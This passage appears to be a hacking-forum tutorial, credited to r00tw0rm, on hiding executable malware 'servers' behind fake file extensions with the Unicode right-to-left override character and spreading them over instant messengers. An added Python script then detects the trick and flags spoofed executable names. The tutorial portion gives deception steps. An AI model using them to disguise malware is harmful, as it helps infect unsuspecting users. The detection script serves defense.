    Most browsers have patched this, but it can be used on IMs like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.

    Now go ahead and mix around with .exe/.scr/.com and the fake extensions to find some other legit-looking combinations! If you have any questions, feel free to ask!

    Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers/general/righttoleften-override.pdf

    Those who can't find the character in the default CharMap in Windows, do this (not sure if it works but worth a try):

    1. Download BabelMap and run it.
    2. Open this picture:
       - Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font.
       - Search for OVERRIDE and click on the RTLO character (row 2020, column E)
       - Click on the Select button
       - Click on the Copy button

    Also, those who have problems with WinXP and non-English OS versions, take a look at this.

    article from r00tw0rm
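A defensive check for the file-name trick described in the post above, as an added example that is not part of the original post or the linked paper: it flags names that contain bidirectional control characters and compares the extension the operating system acts on with the one a user would read. The function names, the extension list and the sample names are assumptions constructed for illustration.

```python
import os
import unicodedata

# Explicit bidirectional formatting characters (embeddings, overrides, isolates, marks).
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f\u061c")
RLO, LRO, PDF = "\u202e", "\u202d", "\u202c"
# Assumed policy list of extensions that Windows runs directly.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif"}

def displayed_name(name):
    """Approximate what a bidi-aware UI shows: text inside an RLO run is drawn reversed.
    Simplification: non-nested RLO/LRO runs only, not the full Unicode Bidi Algorithm."""
    out, run, reverse = [], [], False
    for ch in name:
        if ch in (RLO, LRO, PDF):
            out.append("".join(reversed(run) if reverse else run))
            run, reverse = [], ch == RLO
        elif ch not in BIDI_CONTROLS:
            run.append(ch)
    out.append("".join(reversed(run) if reverse else run))
    return "".join(out)

def inspect_name(name):
    """Return (verdict, controls, real_ext, shown_ext) for one file name."""
    controls = [unicodedata.name(c) for c in name if c in BIDI_CONTROLS]
    real_ext = os.path.splitext(name)[1].lower()                   # what the OS acts on
    shown_ext = os.path.splitext(displayed_name(name))[1].lower()  # what the user reads
    if controls and real_ext != shown_ext and real_ext in EXECUTABLE_EXTS:
        verdict = "block"    # executable whose visible extension is different
    elif controls:
        verdict = "review"   # a bidi control in a file name is unusual even when harmless
    else:
        verdict = "ok"
    return verdict, controls, real_ext, shown_ext

# Constructed sample names; the first follows the naming described in the post above.
SAMPLES = [
    "songname uploaded by \u202e3pm.SCR",
    "notes\u200f.txt",
    "\u05e9\u05dc\u05d5\u05dd.txt",  # ordinary Hebrew name, no control characters
    "report.pdf",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(ascii(sample), inspect_name(sample))
```

The same comparison can run in a mail gateway, an upload handler or an archive scanner, where the raw name is available before any UI renders it.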